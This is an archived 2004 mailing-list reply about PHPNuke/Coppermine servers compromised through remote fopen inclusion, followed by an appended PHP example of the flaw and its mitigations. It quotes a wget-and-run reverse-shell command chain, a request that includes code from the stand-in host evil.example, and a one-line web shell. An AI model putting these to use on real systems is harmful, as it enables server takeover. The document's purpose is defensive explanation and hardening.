Re: Strange Attack On A Webserver I Work On

From: Tom Walsh (
Date: 10/31/04

  • Next message: Vincent IP: "Linux security compliance"
    To: <>
    Date: Sun, 31 Oct 2004 14:23:22 -0600

    > I started to think about a Zombie network a little bit later, as it seems
    > to be the only thing that would make sense aside from the script kiddy
    > screwing up. Do you know if it's at all possible, or if there have ever
    > been any vulnerabilities in PHP or PHP based software (PHPNuke for
    > example, lots of users on the server use this) to execute the code? I
    > know it would execute properly through apache as it's not PHP code, it's a
    > binary file.... but maybe there's a way to force it to execute using the
    > built in system() command or something? Just a thought.


    If you have PHPNuke installations and any of them are using the Coppermine
    gallery (, there is a remote
    fopen exploit through this combination. I have had several customers'
    servers exploited by this type of attack. For the most part they were all
    based out of Brazil using well published and documented exploits. Typically
    they use the webspace of a compromised server to host a remote reverse shell
    application. Using the fopen technique, they are able to inject a series of
    local commands (cd /tmp; wget;
    /tmp/remoteshell &; rm /tmp/remoteshell). They then connect to the remote
    shell and try various forms of local root exploits on the kernel. Depending
    on the level of success they have with that, they will either:

    1) If they obtain root privileges, install their own "h4x0r" index.php for
    every instance of index.php and index.html and submit the sites listed to
    some site that tracks "h4x0r3d" sites. They will install some sort of IRC
    bouncer, or IRC script and attach it to some IRC channel as a zombie. They
    will leave the remote shell running for future needs, and sign off.

    2) If they are unable to get root privileges, they will typically install an
    IRC bouncer and maybe an IRC zombie script, leaving the remote shell running
    and then signing off.

    I was able to observe their movements for a couple of days as a mock IRC
    zombie, joining their IRC channels and watching their discussions; as most
    of it was in Portuguese, I wasn't able to follow too much of it.

    I used the zombie information collected in the IRC channels to contact other
    server admins of compromised servers, and inform them of the compromise.
    Almost all had no idea that they were compromised at all, and my contact
    was the first indication of trouble. After discussions with these admins
    the common denominator seemed to be PHPNuke with Coppermine. (I believe that
    Coppermine is no longer supported by the author and as such these
    vulnerabilities will not be corrected.)

    To prevent problems like this, I typically turn off remote fopen privileges
    in php.ini (allow_url_fopen = Off). I have only had a couple of instances
    where customers have requested that it be turned on, and most of the time we
    have found an alternative solution.

    With reference to your previous discussion, perhaps the script kiddie was
    attempting to put the file in place for downloading to another computer for
    a remote attack (like the method above). Just a suggestion and thought.
    Seems rather obvious, and not terribly bright, though.

    If you need any additional information, please let me know and I will try
    and provide you with what ever information I have available.

    Tom Walsh
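The remote-fopen include pattern described in the message above, next to the php.ini mitigation and a code-level fix, as an added example. This is not code from the thread, from PHPNuke or from Coppermine; the script layout, the `skin` parameter, the skin file names and the attacker host `evil.example` are assumptions made for illustration.

```php
<?php
// Added example, not code from the thread, PHPNuke or Coppermine.
// The `skin` parameter, skin paths and the host evil.example are assumptions.

// ---- The vulnerable pattern -------------------------------------------
// With allow_url_fopen = On (the default in PHP 4 and early PHP 5), include()
// accepts an http:// URL. A request such as
//     theme.php?skin=http://evil.example/rs.txt?
// makes PHP fetch rs.txt from the attacker's (usually already compromised)
// web space and execute it. The trailing '?' turns the appended
// '/header.php' into a harmless query string on the remote URL.
function vulnerable_include(): void
{
    $skin = $_GET['skin'] ?? 'default';   // attacker-controlled
    include $skin . '/header.php';        // remote code executes here
}

// rs.txt on the attacker's host would be a one-liner along the lines of
//     <?php system($_GET['cmd']); ?>
// through which the command chain from the message is pushed:
//     cd /tmp; wget ...; /tmp/remoteshell &; rm /tmp/remoteshell

// ---- Mitigation layer 1: php.ini (server-wide) --------------------------
//     allow_url_fopen   = Off   ; what the message recommends; disables http://, ftp:// wrappers for fopen/include
//     allow_url_include = Off   ; separate directive since PHP 5.2 that governs include/require on its own
// Refuse to keep running if a php.ini regression re-enables remote includes.
function remote_include_enabled(): bool
{
    return filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN)
        || filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

// ---- Mitigation layer 2: never build an include path from request data ----
// Map the request value onto a fixed allow-list of local files. This also
// stops the local variants (../ traversal, previously uploaded files) that
// allow_url_fopen = Off does nothing about.
const SKINS = [
    'default' => 'skins/default/header.php',
    'dark'    => 'skins/dark/header.php',
];

function resolve_skin(string $requested): ?string
{
    if (!array_key_exists($requested, SKINS)) {
        return null;                       // unknown key: no include at all
    }
    return __DIR__ . '/' . SKINS[$requested];
}

function hardened_include(): void
{
    if (remote_include_enabled()) {
        error_log('remote file inclusion is enabled in php.ini');
    }
    $path = resolve_skin($_GET['skin'] ?? 'default');
    if ($path === null) {
        http_response_code(400);
        exit('unknown skin');
    }
    include $path;
}

hardened_include();
```

With `allow_url_fopen = Off` the vulnerable function still exists but the request `?skin=http://evil.example/rs.txt?` fails with a "wrapper is disabled" warning instead of executing the remote file. The allow-list in `resolve_skin()` is the fix that survives a later php.ini change, and it is the only one of the two layers that also blocks local-file inclusion through `../` paths.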
